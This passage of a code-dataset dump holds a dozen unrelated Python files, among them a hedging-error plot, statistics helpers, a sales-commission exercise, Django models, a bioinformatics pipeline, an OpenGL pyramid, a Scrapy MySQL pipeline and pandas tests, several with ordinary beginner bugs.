Density')\nax[0].set_title('21 rebalancing trades')\nax[1].hist(er84,range=(-1.5,1.5),density=True,color='r')\nax[1].set_title('84 rebalancing trades')\nax[1].set_xlabel('Final profit/loss')\nfig.tight_layout()\nplt.show()\nfig.savefig('Hedging_error',bbox_inches = 'tight')\n\nmean1,std1=np.mean(er21), np.std(er21)\nmean2,std2=np.mean(er84), np.std(er84)\n\n","sub_path":"Dynamic hedging/part4.py","file_name":"part4.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191073277","text":"def media(i=[]):\n '''\n Faz a média de itens em uma lista\n :param i: qualquer lista\n :return: retorna a média em float\n '''\n n = sum(i)\n c = len(i)\n m = n / c\n return m\n\n\ndef varian(l=[]):\n '''\n Calcula a variância em uma lista\n :param l: lista qualquer com números\n :return: retorna a variância calculada\n '''\n n = n1 = s = 0\n m = media(l)\n for c in range(0, len(l)):\n n += (l[c] - m) ** 2\n n1 = c - 1\n s = n / n1\n return s\n\n\ndef desvio_pad(i=[]):\n '''\n Calcula o desvio padrão de uma lista\n :param i: lista qualquer com números\n :return: retorna o valor desvio padrão\n '''\n from math import sqrt\n s = v = 0\n v = varian(i)\n s = sqrt(v)\n return s\n\n\ndef coef_var(l=[]):\n \"\"\"\n Calcula o ceficiente de variação em uma lista de números\n :param l: lista de números qualquer\n :return: retorna o valor do coeficiente de variação\n \"\"\"\n s = m = cv = 0\n s = desvio_pad(l)\n m = media(l)\n cv = s / m\n return cv\n\n\n'''dados = list()\ncri_lis(dados)\nprint(dados)\nm = media(dados)\nprint(m)\nordenadora(dados)\nprint(dados)\nv = varian(dados)\nprint(v)\nd = desvio_pad(dados)\nprint(d)\ncv = coef_var(dados)\nprint(cv)'''\n","sub_path":"utilidades/estatic.py","file_name":"estatic.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"114726274","text":"'''\nCosmos Trading company\nSales is a dictionary with the sale for each seller identified with a code number\nBase salary is the minimum salary\nBase salary ratio is a ratio that improve the base salary based on the the qualification of each sales person\nsellers list of each seller including the salary ratio and the zip code\n1. Print and order a list of sellers in ascending and descending order\n2. Print a list with complete name first name and lastname and the salary of each employee\n3. Each seller has a commission for their sales equals to 1% if the sales more than 100 and 2% if it is over 125,\n if the sales are less than or equal to 100, calculate the base salary and commission\n4. Sellers are located in different cities make a list with the name of the seller and the State where they are located\n5. Apply the concept of OOP and make a list with the full name of each seller, total salary and the state where it is located\n'''\n# Sales in thousands\nsales = {1:125, 2:150, 3:95, 4:114, 5:89}\nbase_salary = 5000\nbase_salary_ratio = {'l1':2, 'l2':1.5, 'l3': 1.0}\n#Code, name, lastname, code_salary_ratio, zip_code\nsellers = [[1, 'Albert', 'Sandler', 'l2', '33142'],\n[2, 'Carl', 'Sagan', 'l1', '11530'],\n[3, 'John', 'Maxwell', 'l2', '10013'],\n[4, 'Stephen', 'Hawking', 'l1', '90290'],\n[5, 'Doroty', 'Simmons', 'l3', '90803']]\n\nzip_codes = {'33142':'Miami, FL',\n'11530':'Garden City, NY',\n'10013': 'New York, NY',\n'90290':'Topanga, CA',\n'90803':'Long Beach, CA'}\n\nclass Seller:\n #Can pass a list with the values\n def __init__(self, *args):\n self.code = args[0][0]\n self.name = args[0][1]\n self.surname = args[0][2]\n self.csr = args[0][3]\n self.zip_code = args[0][4]\n \n def __str__(self):\n return self.name + ' ' + self.surname\n \n def __lt__(self, other):\n return self.surname < other.surname\n\n def calculate_salary(self):\n return float(base_salary * base_salary_ratio[self.csr])\n\n def calculate_comission(self):\n commision = 0.0\n amount_of_sales = sales[self.code]\n if amount_of_sales > 125:\n commision = (amount_of_sales*1000)*0.02\n elif amount_of_sales > 100:\n commision = (amount_of_sales*1000)*0.01\n return commision\n\n def total_salary(self):\n return self.calculate_salary() + self.calculate_comission()\n\n def get_state(self):\n try:\n return zip_codes[self.zip_code]\n except:\n return 'Error State not in list'\n \n \nsales_persons = [Seller(x) for x in sellers]\nfor x in sales_persons:\n print(str(x))\nsales_persons.sort()\nprint('**************Sorting Ascending*********************')\nfor x in sales_persons:\n print(str(x))\nprint('*******************Sorting descending****************')\nsales_persons.sort(reverse=True)\nfor x in sales_persons:\n print(str(x))\nprint(\"Salary for each sales person\")\nsalary_list = [[str(x), x.calculate_salary()] for x in sales_persons]\nfor x in salary_list:\n print('Salesperson: {0} Salary: {1:.2f}'.format(x[0], x[1]))\nprint('Calculating Salary and commsion for each sales person')\ncommision_salary_list = [[str(x), x.calculate_salary(), x.calculate_comission()] for x in sales_persons]\nfor x in commision_salary_list:\n print('Salesperson: {0} Base Salary: {1:.2f} Comission: {2:.2f}'.format(x[0], x[1], x[2]))\n\nprint('The sales persons are located in these areas:')\nsales_persons_areas = [[str(x), x.get_state()] for x in sales_persons]\nfor x in sales_persons_areas:\n print('{0} is located in {1}'.format(x[0], x[1]))\n\nsales_person_total_salary_area = [[str(x), x.total_salary(), x.get_state()] for x in sales_persons]\nfor x in sales_person_total_salary_area:\n print('{0} located in {1} earned {2:.2f} in total.'.format(x[0], x[2], x[1]))\n\n ","sub_path":"python_machine_learning/cosmos_exercis.py","file_name":"cosmos_exercis.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"163382402","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom ..users.models import User\n\n# Create your models here.\nclass Author(models.Model):\n name = models.CharField(max_length=50)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\nclass BookManager(models.Manager):\n def new_book(self, post_data):\n errors = []\n if len(post_data['author_text']) < 1 and post_data['author_select'] == \"None\":\n errors.append('Must select author from list or add a new one')\n if len(post_data['title']) < 1:\n errors.append('Title cannot be empty')\n if len(post_data['review']) < 1:\n errors.append('Review cannot be empty')\n\n if len(errors) != 0:\n return errors\n\n new_author = False\n if len(post_data['author_text']) > 0:\n new_author = True\n\n author = None\n if new_author:\n author = Author.objects.create(name=post_data['author_text'])\n else:\n author = Author.objects.get(id=int(post_data['author_select']))\n\n user = User.objects.get(id=int(post_data['user_id']))\n\n book = Book.objects.create(\n title=post_data['title'],\n author=author\n )\n\n review = Review.objects.create(\n user=user,\n book=book,\n review=post_data['review'],\n rating=int(post_data['rating'])\n )\n\n return book.id\n\n\n\nclass Book(models.Model):\n title = models.CharField(max_length=100)\n author = models.ForeignKey(Author, related_name=\"books\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n objects = BookManager()\n\nclass Review(models.Model):\n user = models.ForeignKey(User, related_name=\"user_reviews\")\n book = models.ForeignKey(Book, related_name=\"book_reviews\")\n review = models.TextField(max_length=400)\n rating = models.SmallIntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n","sub_path":"django/belt_reviewer_assignment/apps/books/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"14487571","text":"from pathlib import Path\nimport os\nimport copy\nimport csv\nimport json\nimport datetime\nimport shutil\nfrom Bio import SeqIO\nimport itertools\nimport botocore\nimport boto3\n\nfrom pipeline.utils import inter_path, update_log, output_path, setup_paths, get_info_for_sample\nfrom pipeline.read_raw_files import process_files, unzip_files\nfrom pipeline.flank_finder import find_flanking_sequences\nfrom pipeline.read_aligner import run_alignment\nfrom pipeline.plotting import make_genome_plots\nfrom pipeline.trans_dist_plot import make_trans_dist_plot\nfrom pipeline.plasmid_plot import plot_plasmid\nfrom pipeline.output_bw import create_bw_outputs\n\nfrom parameters import read_files_dir, Qscore_threshold, info_file, delete_intermediates\n\ndef get_samples_to_process(isCloud):\n\tif not isCloud:\n\t\t# if running locally use this path\n\t\tif not Path(info_file).exists():\n\t\t\tprint(\"Could not find the info file with sample information, see the parameters.py file\")\n\t\t\treturn\n\t\tsamples_to_process = []\n\t\ttry:\n\t\t\twith open(Path(info_file), 'r', encoding='utf-8-sig') as opened_info_file:\n\t\t\t\treader = csv.DictReader(opened_info_file)\n\t\t\t\tsamples_to_process = [row for row in reader]\n\t\texcept: \n\t\t\twith open(Path(info_file), 'r', encoding='ISO-8859-1') as opened_info_file:\n\t\t\t\treader = csv.DictReader(opened_info_file)\n\t\t\t\tsamples_to_process = [row for row in reader]\n\t\treturn samples_to_process\n\n\t# if on aws load from the sqs json and download the data files from s3\n\twith open('./sqs_message.json', 'r') as info_json:\n\t\tinfo = json.load(info_json)\n\tsetup_paths(info['Sample'], isCloud)\n\t# if in cloud download the s3 files to the container\n\tif isCloud:\n\t\ts3 = boto3.client('s3')\n\t\tfor item in s3.list_objects(Bucket='sternberg-sequencing-data', Prefix=f\"ngs_data/basespace/{info['analysisId']}/{info['Sample']}\")['Contents']:\n\t\t\tkey = item['Key']\n\t\t\tfilename = key.split('/')[-1]\n\t\t\ts3.download_file('sternberg-sequencing-data', key, f'./tmp/raw/{filename}')\n\t\tif info['Target fasta file']:\n\t\t\ts3.download_file('sternberg-sequencing-data', f\"bioinformatic_resources/genomes/{info['Target fasta file']}\", f\"./tmp/{info['Target fasta file']}\")\n\t\tif info['Second target fasta file']:\n\t\t\ts3.download_file('sternberg-sequencing-data', f\"bioinformatic_resources/plasmids/{info['Second target fasta file']}\", f\"./tmp/{info['Second target fasta file']}\")\n\n\treturn [info]\n\ndef main(isCloud=False):\n\ttoday_string = datetime.datetime.now().strftime('%Y%m%d')\n\tsamples_to_process = get_samples_to_process(isCloud)\n\tall_samples_logs = []\n\tfor sample_info in samples_to_process:\n\t\tsample = sample_info['Sample']\n\t\texperiment_date_string = None\n\t\ttry:\n\t\t\texperiment_date = datetime.datetime.strptime(sample_info.get(\"Experiment date\"), '%Y%m%d')\n\t\t\tif experiment_date.year > 2000 and experiment_date.year < 3000:\n\t\t\t\texperiment_date_string = experiment_date.strftime('%Y%m%d')\n\t\texcept:\n\t\t\tpass\n\t\t# unzip files for the sample (deletes the zips if \"delete_intermediates\" is true)\n\t\tunzip_files(sample, isCloud)\n\t\tsetup_paths(sample, isCloud)\n\t\tmeta_info = sample_info if isCloud else get_info_for_sample(sample)\n\t\tmeta_info['output_date'] = experiment_date_string if experiment_date_string else today_string\n\t\toriginal_input = copy.deepcopy(meta_info)\n\t\t\n\t\tif isCloud:\n\t\t\tmeta_info['Target fasta file'] = os.path.join(Path(__file__).parent.absolute(), 'tmp', meta_info['Target fasta file'])\n\t\t\tif meta_info['Second target fasta file']:\n\t\t\t\tmeta_info['Second target fasta file'] = os.path.join(Path(__file__).parent.absolute(), 'tmp', meta_info['Second target fasta file'])\n\n\t\tprint('----------')\n\t\tprint('----------')\n\t\tprint(\"PROCESSING SAMPLE {}...\".format(sample))\n\t\tprint('----------')\n\t\tprint('----------')\n\n\n\t\tlog_info = {\n\t\t\t'Sample': sample,\n\t\t\t'Qscore Threshold': str(Qscore_threshold),\n\t\t\t'Input Parameters': original_input,\n\t\t\t'Run date': today_string,\n\t\t\t'Experiment date': experiment_date_string\n\t\t}\n\n\t\t\n\t\t# step 1: process raw files, concatenate\n\t\traw_files_dir = Path(read_files_dir) if not isCloud else './tmp/raw'\n\t\tfiltered_path = inter_path('{}_FILTERED.fastq'.format(sample))\n\t\tfiles = list(itertools.chain(Path(raw_files_dir).glob(f\"{sample}*.fastq\"), Path(raw_files_dir).glob(f\"{sample}*/*.fastq\")))\n\t\tfilenames = [path.resolve() for path in files]\n\t\tif len(filenames) < 1:\n\t\t\tprint(\"COULD NOT FIND ANY FASTA FILES FOR THE SAMPLE\")\n\t\t\tcontinue\n\t\tprocess_results = process_files(sample, filenames, filtered_path, meta_info)\n\t\tlog_info.update(process_results)\n\t\t\n\t\t# step 2: Find the transposon end flanking sequences\n\t\tflanks_path = inter_path(\"{}_FLANKS.fasta\".format(sample))\n\t\tfp_results = find_flanking_sequences(filtered_path, flanks_path, meta_info)\n\t\tlog_info.update(fp_results)\n\n\t\t# step 3: align the reads in the genome\n\t\talignment_results = run_alignment(flanks_path, meta_info)\n\t\tlog_info.update(alignment_results)\n\n\n\t\thistogram_path = output_path(os.path.join('samples', f\"{meta_info['output_date']}_{sample}_target_read_locations.csv\"))\n\t\tsecond_histogram_path = output_path(os.path.join('samples', f\"{meta_info['output_date']}_{sample}_second_target_read_locations.csv\"))\n\t\tif Path(histogram_path).exists():\n\t\t\trun_information = make_genome_plots(histogram_path, meta_info)\n\t\t\tmake_trans_dist_plot(histogram_path, run_information)\n\n\t\tif len(meta_info['Second target fasta file']) > 1:\n\t\t\trun_information = plot_plasmid(second_histogram_path, meta_info)\n\t\t\n\t\tall_samples_logs.append(log_info)\n\t\tif delete_intermediates:\n\t\t\t# delete intermediate files\n\t\t\tshutil.rmtree(Path(inter_path('')).absolute())\n\t\t\t# delete unzipped files if zips are present\n\t\t\tfor file in files:\n\t\t\t\tif Path(f'{file}.gz').exists():\n\t\t\t\t\tos.remove(file)\n\t\n\toutput_log_path = update_log(all_samples_logs)\n\tcreate_bw_outputs(output_log_path)\n\tif delete_intermediates:\n\t\tintermediates_dir = os.path.join(Path(__file__).parent.absolute(), 'intermediates')\n\t\tshutil.rmtree(intermediates_dir)\n\t\t\n\treturn log_info\n\nif __name__== \"__main__\":\n\tmain()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"555515847","text":"from OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\n\nvertices = (\n (0, 0.6, 0)\n (1, -1, 1), \n (1, -1, -1), \n (-1, -1, -1), \n (-1, -1, 1), \n )\n\nlinhas = (\n (0, 1),\n (0, 2),\n (0, 3), \n (0, 4),\n (1, 2),\n (1, 4),\n (2, 3),\n (3, 4)\n )\n\nfacesTriangulo = (\n (0, 1, 2),\n (0, 1, 4),\n (0, 3, 4),\n (0, 3, 2)\n )\n\nfacesBase= (1, 2, 3, 4)\ncores = ( (1,0,0),(1,1,0),(0,1,0),(0,1,1),(0,0,1))\n\ndef Piramide():\n #criando a base da piramide\n glBegin(GL_QUADS)\n glVertex3fv(vertices[1])\n glVertex3fv(vertices[2])\n glVertex3fv(vertices[3])\n glVertex3fv(vertices[4])\n glEnd()\n\n #desenhando os triangulos\n glBegin(GL_TRIANGLE_FAN)\n glColor3f(0, 1, 0)\n glVertex3fv(vertices[0])\n glColor3f(0, 0, 1)\n glVertex3fv(vertices[1])\n glVertex3fv(vertices[2])\n glVertex3fv(vertices[3])\n glVertex3fv(vertices[4])\n glVertex3fv(vertices[1])\n glEnd()\n\ndef abacaxi():\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n glRotatef(2,1,3,0)\n Piramide()\n glutSwapBuffers()\n \ndef timer(i):\n glutPostRedisplay()\n glutTimerFunc(50,timer,1)\n\n# PROGRAMA PRINCIPAL\nglutInit(sys.argv)\nglutInitDisplayMode(GLUT_DOUBLE | GLUT_RGBA | GLUT_DEPTH | GLUT_MULTISAMPLE)\nglutInitWindowSize(800,600)\nglutCreateWindow(\"PIRAMIDE BASE QUADRADA\")\nglutDisplayFunc(abacaxi)\nglEnable(GL_MULTISAMPLE)\nglEnable(GL_DEPTH_TEST)\nglClearColor(0.,0.,0.,1.)\ngluPerspective(45,800.0/600.0,0.1,50.0)\nglTranslatef(0.0,0.0,-8)\nglRotatef(45,1,1,1)\nglutTimerFunc(50,timer,1)\nglutMainLoop()\n","sub_path":"Trabalho Poligonos/piramideBaseQuadrada.py","file_name":"piramideBaseQuadrada.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"589162570","text":"# -*- coding: utf-8 -*-\nimport logging\nimport mysql.connector\nfrom datetime import datetime\nfrom hashlib import md5\n\n# conn test: mysql -u root -p 或者 mysql -u mezhou887 -pmezhou887\n\n# pip install mysql-connector-python \nclass MySQLPipeline(object): \n \n def __init__(self, conn):\n self.conn = conn\n self.cur = conn.cursor()\n self.process_query = \"insert into cnbeta(linkmd5id, pagelink, title, now) values(%s, %s, %s, %s);\"\n\n @classmethod\n def from_settings(cls, settings):\n config={'host':settings.get('MYSQL_HOST', 'localhost'), \n 'user':settings.get('MYSQL_USER', 'mezhou887'), \n 'password':settings.get('MYSQL_PASSWD', 'mezhou887'), \n 'port':3306,\n 'database':settings.get('MYSQL_DBNAME', 'scrapy'), \n 'charset':'utf8' \n }\n conn = mysql.connector.connect(**config)\n return cls(conn);\n \n def process_item(self, item, spider):\n now = datetime.utcnow().replace(microsecond=0).isoformat(' ')\n linkmd5id = self._get_linkmd5id(item)\n logging.debug(self.process_query + now) \n self.cur.execute(self.process_query, (linkmd5id, item['pagelink'], item['title'][0], now))\n self.conn.commit()\n \n def _get_linkmd5id(self, item): \n return md5(item['pagelink']).hexdigest() \n\n def spider_closed(self, spider):\n self.cur.close()\n self.conn.close()","sub_path":"release/cnbeta/cnbeta/mysql_pipeline.py","file_name":"mysql_pipeline.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"95216248","text":"import pandas as pd\nimport pytest\nfrom . import stringify\n\n\n@pytest.fixture\ndef df_byte_col():\n data = {\n b'a': [1, 2, 3],\n 'b': [1, 2, 3],\n b'c': [1, 2, 3]\n }\n index = [0, 1, 2]\n return pd.DataFrame(data, index)\n\n\n@pytest.fixture\ndef df_byte_index_name():\n data = {\n 'a': [1, 2, 3],\n 'b': [1, 2, 3],\n 'c': [1, 2, 3]\n }\n index = [0, 1, 2]\n df = pd.DataFrame(data, index)\n df.index.name = b'index'\n return df\n\n\n@pytest.fixture\ndef df_normal():\n data = {\n 'a': [1, 2, 3],\n 'b': [1, 2, 3],\n 'c': [1, 2, 3]\n }\n index = [0, 1, 2]\n df = pd.DataFrame(data, index)\n df.index.name = 'index'\n return df\n\n\n@pytest.fixture\ndef byte_store(df_byte_col, df_byte_index_name, df_normal, tmpdir):\n p = tmpdir.mkdir('data').join('byte_store.h5')\n store = pd.HDFStore(str(p), 'w')\n\n dfs_to_add = {\n 'df_byte_col': df_byte_col,\n 'df_byte_index_name': df_byte_index_name,\n 'df_normal': df_normal\n }\n\n for name, df in dfs_to_add.items():\n store.put(name, df)\n\n store.close()\n return str(p)\n\n\ndef test_check_for_bytes(byte_store):\n with pd.HDFStore(byte_store) as store:\n\n assert stringify.check_df_for_bytes(\n store['df_byte_col']) is True\n assert stringify.check_df_for_bytes(\n store['df_byte_index_name']) is True\n assert stringify.check_df_for_bytes(\n store['df_normal']) is False\n\n\ndef test_decode_bytes(byte_store, tmpdir):\n\n stringify.convert_store(byte_store, 'converted')\n converted_fp = str(tmpdir.join('byte_store_converted.h5'))\n\n with pd.HDFStore(converted_fp) as new:\n for name in new.keys():\n assert stringify.check_df_for_bytes(new[name]) is False\n","sub_path":"test_stringify.py","file_name":"test_stringify.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"424919153","text":"from ursina import *\r\nimport Game\r\n\r\nc = False\r\np = (0,0,0)\r\n\r\napp = Ursina()\r\n\r\ngame = Game.Game(2)\r\n\r\ncamera.orthographic = True\r\ncamera.position = (0, 0, -20)\r\ncamera.origin = (0, 0)\r\ncamera.fov = 6\r\n\r\n\r\n\r\ndef update():\r\n global c\r\n global p\r\n camera.x += held_keys['d'] * 2 * time.dt # move camera left\r\n camera.x -= held_keys['a'] * 2 * time.dt # right\r\n camera.y += held_keys['w'] * 2 * time.dt # up\r\n camera.y -= held_keys['s'] * 2 * time.dt # down\r\n camera.z += held_keys['q'] * 4 * time.dt # zoom in\r\n camera.z -= held_keys['e'] * 4 * time.dt # zoom out\r\n\r\n if mouse.middle:\r\n if c:\r\n p = mouse.position\r\n c = True\r\n else:\r\n camera.x += (mouse.position[0] - p[0]) * .25 * camera.fov * .15\r\n camera.y += (mouse.position[1] - p[1]) * .25 * camera.fov * .15\r\n else:\r\n c = False\r\n\r\ndef input(key):\r\n if key == Keys.scroll_up:\r\n #camera.z += 5 * time.dt\r\n camera.fov -= 1\r\n if key == Keys.scroll_down:\r\n #camera.z -= 5 * time.dt\r\n camera.fov += 1\r\n\r\n\r\napp.run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"235530308","text":"import os \n# CONFIGURE THE SETTINGS FOR THE PROJECT\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', \"prm.settings\")\n\nimport django\ndjango.setup() # configure settings\nimport random\nfrom prm_firstapp.models import Salary\nfrom faker import Faker\n\n# create instance of faker\n\nfakegen = Faker()\nemployees = ['A', 'B', 'C']\n\ndef add_employee():\n # pick one of the emloyees randomly\n s = Salary.objects.get_or_create(empid= random.choice(employees))[0] # tuple is returned. \n print (s)\n #s.save()\n return s\n\n\ndef populate(N=5):\n # N is changeable\n for entry in range (N):\n # get employee id\n #emp = add_employee()\n emp = random.choice(employees)\n\n\n # create fake data for that entry\n fake_A = fakegen.random_int()\n print (fake_A)\n fake_B = fakegen.random_int()\n fake_C = fakegen.random_int()\n fakeDate = fakegen.date()\n # create a web page entry\n webpg = Salary.objects.get_or_create(empid = emp, beltA = fake_A, beltB = fake_B, beltC= fake_C, makingDate = fakeDate)[0]\n print (webpg)\nif __name__ == '__main__':\n print('populating the database')\n populate(5)\n print (\"populating complete\")\n ","sub_path":"prm/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"58742559","text":"import subprocess\n\n\ndef add_node_version_segment(powerline):\n try:\n p1 = subprocess.Popen([\"node\", \"--version\"], stdout=subprocess.PIPE)\n version = p1.communicate()[0].decode(\"utf-8\").rstrip()\n version = \"node \" + version\n powerline.append(version, 15, 18)\n except OSError:\n return\n","sub_path":"segments/node_version.py","file_name":"node_version.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"462886756","text":"# -*- coding:utf-8 -*-\n\nfrom manager.models import *\nfrom weixin.models import *\nimport datetime\nimport time\n\ndef get_today_daily_detail(is_admin):\n\tdaily_detail_list = []\n\n\tgood_list = VirtualMoney.objects.all()\n\tif(is_admin):\n\t\tcharge_list = Recharge.objects.filter(recharge_time__day=datetime.date.today().strftime('%d'), recharge_type=1 )\n\t\tsource='管理员充值'\n\telse:\n\t\tcharge_list = Recharge.objects.filter(recharge_time__day=datetime.date.today().strftime('%d'), recharge_type=0 )\n\t\tsource='自己充值'\n\n\n\tfor charge in charge_list:\n\t\tdaily_detail = DailyDetail(consumer=charge.recharge_person, time=charge.recharge_time, action=1,source=source, value=charge.recharge_value)\n\n\t\twallet_list=WalletMoney.objects.filter(recharge=charge)\n\t\tddc_content=[]\n\t\tfor g in good_list:\n\t\t\tcontent={'name':g.name, 'number':0}\n\t\t\tfor w in wallet_list:\n\t\t\t\tif(w.money==g):\n\t\t\t\t\tcontent['number']=content['number']+1\n\n\t\t\tnumber=content['number']\n\t\t\tif(number!=0):\n\t\t\t\tddc = DailyDetailContent(good=g, number=number, daily_detail=daily_detail )\n\t\t\t\tddc_content.append(ddc)\n\n\t\tdaily_detail.content = ddc_content\n\t\tdaily_detail_list.append(daily_detail)\n\n\tticket_list = Ticket.objects.filter(is_consume=True, ticket_type=0, consume_time__day=datetime.date.today().strftime('%d'))\n\t#ticket_list = Ticket.objects.filter(is_consume=True)\n\tfor ticket in ticket_list:\n\t\twallet_list=WalletMoney.objects.filter(ticket=ticket)\n\t\tcontent=[]\n\t\tfor wallet in wallet_list:\n\t\t\tif(is_admin and wallet.recharge.rechage_type==1):\n\t\t\t\tsource = u\"%s的充值\"%(wallet.recharge.recharge_person.name)\n\t\t\t\tdaily_detail = DailyDetail(consumer=wallet.consumer, time=ticket.consume_time, action=-1,source=source, value=wallet.money.price)\n\t\t\t\tddc = DailyDetailContent(good=wallet.money, number=1, daily_detail=daily_detail )\n\t\t\t\tcontent.append(ddc)\n\t\t\t\tdaily_detail.content=content\n\t\t\t\tdaily_detail_list.append(daily_detail)\n\t\t\telif(not is_admin and wallet.recharge.rechage_type==0):\n\t\t\t\tsource = u\"%s的充值\"%(wallet.recharge.recharge_person.name)\n\t\t\t\tdaily_detail = DailyDetail(consumer=wallet.consumer, time=ticket.consume_time, action=-1,source=source, value=wallet.money.price)\n\t\t\t\tddc = DailyDetailContent(good=wallet.money, number=1, daily_detail=daily_detail )\n\t\t\t\tcontent.append(ddc)\n\t\t\t\tdaily_detail.content=content\n\t\t\t\tdaily_detail_list.append(daily_detail)\n\n\tdaily_detail_list=sorted(daily_detail_list, key=lambda x: x.time)\n\treturn daily_detail_list\n\ndef get_today_statistics_list():\n\tdaily_detail_list = []\n\t#charge_list = Recharge.objects.filter(recharge_time__day=datetime.date.today().strftime('%d')).order_by('recharge_time')\n\n\tgood_list = VirtualMoney.objects.all()\n\tcharge_list = Recharge.objects.all()\n\n\ttotal_content_list=[]\n\tfor g in good_list:\n\t\ttotal_content={'name':g.name,'price':g.price, 'charge':0, 'charge_value':0, 'consume':0, 'consume_value':0}\n\t\ttotal_content_list.append(total_content)\n\n\tfor charge in charge_list:\n\t\tif(charge.recharge_type==1):\n\t\t\tsource='管理员充值'\n\t\telse:\n\t\t\tsource='自己充值'\n\n\t\tcontent_list=[]\n\n\t\twallet_list=WalletMoney.objects.filter(recharge=charge)\n\t\tfor g in good_list:\n\t\t\tcontent={'name':g.name, 'number':0}\n\t\t\tfor w in wallet_list:\n\t\t\t\tif(w.money==g):\n\t\t\t\t\tcontent['number']=content['number']+1\n\t\t\tcontent_list.append(content)\n\n\t\t\tfor tc in total_content_list:\n\t\t\t\tif(tc['name']==g.name):\n\t\t\t\t\ttc['charge']+=content['number']\n\t\t\t\t\ttc['charge_value'] = tc['charge']*g.price\n\n\t\tds = {'consumer':charge.recharge_person, 'time':charge.recharge_time, 'action':'充值', 'content_list':content_list, 'source':source, 'value':charge.recharge_value}\n\t\tdaily_detail_list.append(ds)\n\n\n\t#ticket_list = Ticket.objects.filter(is_consume=True, consume_time__day=datetime.date.today().strftime('%d'))\n\tticket_list = Ticket.objects.filter(is_consume=True)\n\tfor ticket in ticket_list:\n\t\twallet_list=WalletMoney.objects.filter(ticket=ticket)\n\t\tfor wallet in wallet_list:\n\t\t\tcontent=u\"1%s%s\"%(wallet.money.unit, wallet.money.name)\n\t\t\tsource = u\"%s的充值\"%(wallet.recharge.recharge_person.name)\n\t\t\tds = {'consumer':wallet.consumer, 'time':ticket.consume_time, 'action':'消耗', 'content':content, 'source':source, 'value':wallet.money.price}\n\n\t# sort by time\n\tdaily_detail_list=sorted(daily_detail_list, key=lambda s: time.mktime(s['time'].timetuple()))\n\n\ttotal_account={'name':u'合计', 'charge_value':0, 'consume_value':0, 'balance':0}\n\tfor tc in total_content_list:\n\t\ttotal_account['charge_value'] += tc['charge_value']*tc['price']\n\t\ttotal_account['consume_value'] += tc['consume_value']*tc['price']\n\t\ttotal_account['balance'] = total_account['charge_value'] - total_account['consume_value']\n\n\treturn daily_detail_list, total_content_list, total_account\n\n\ndef get_daily_detail( time, is_admin ):\n\tnow = datetime.datetime.now()\n\tif((now-time).days==0):\n\t\treturn get_today_daily_detail(is_admin)\n\telse:\n\t\treturn DailyDetail.objects.filter(time__day=time.day, is_admin=is_admin )\n\n\ndef save_today_daily_detail():\n\tnow = datetime.datetime.now()\n\tDailyDetail.objects.filter(time__day=now.day).delete()\n\tdaily_detail_list=[]\n\tdaily_detail_list.append(get_today_daily_detail(True))\n\tdaily_detail_list.append(get_today_daily_detail(False))\n\tfor daily_detail in daily_detail_list:\n\t\tdaily_detail.save()\n\t\tfor ddc in daily_detail.content:\n\t\t\tddc.daily_detail=daily_detail\n\t\t\tddc.save()\n\ndef get_today_daily_statistics(is_admin):\n\tdsr = DailyStatisticsRecord(is_admin=is_admin)\n\tgood_set = VirtualMoney.objects.all()\n\tdgs_list=[]\n\tfor good in good_set:\n\t\tdgs_list.append(DailyGoodStatistics(good=good, charge_number=0, consume_number=0, daily_statistics=dsr ))\n\n\tdd=get_today_daily_detail(is_admin)\n\tcharge_value=0\n\tconsume_value = 0\n\tfor d in dd:\n\t\tif(d.action==1):\n\t\t\tcharge_value += d.value\n\t\t\tfor dgs in dgs_list:\n\t\t\t\tfor c in d.content:\n\t\t\t\t\tif(dgs.good==c.good):\n\t\t\t\t\t\tdgs.charge_number += c.number\n\n\t\telif(d.action==-1):\n\t\t\tconsume_value += d.value\n\t\t\tfor dgs in dgs_list:\n\t\t\t\tfor c in d.content:\n\t\t\t\t\tif(dgs.good==c.good):\n\t\t\t\t\t\tdgs.consume_number += c.number\n\n\t#for dgs in dgs_list:\n\t# dgs.save()\n\tdsr.content = dgs_list\n\n\tdsr.charge_value = charge_value\n\tdsr.consume_value = consume_value\n\n\treturn dsr\n\ndef save_today_daily_statistics():\n\ttime = datetime.datetime.now()\n\tDailyStatisticsRecord.objects.filter(time__day=time.day).delete()\n\tdaily_statistics = get_today_daily_statistics(True)\n\tdaily_statistics.save()\n\tfor d in 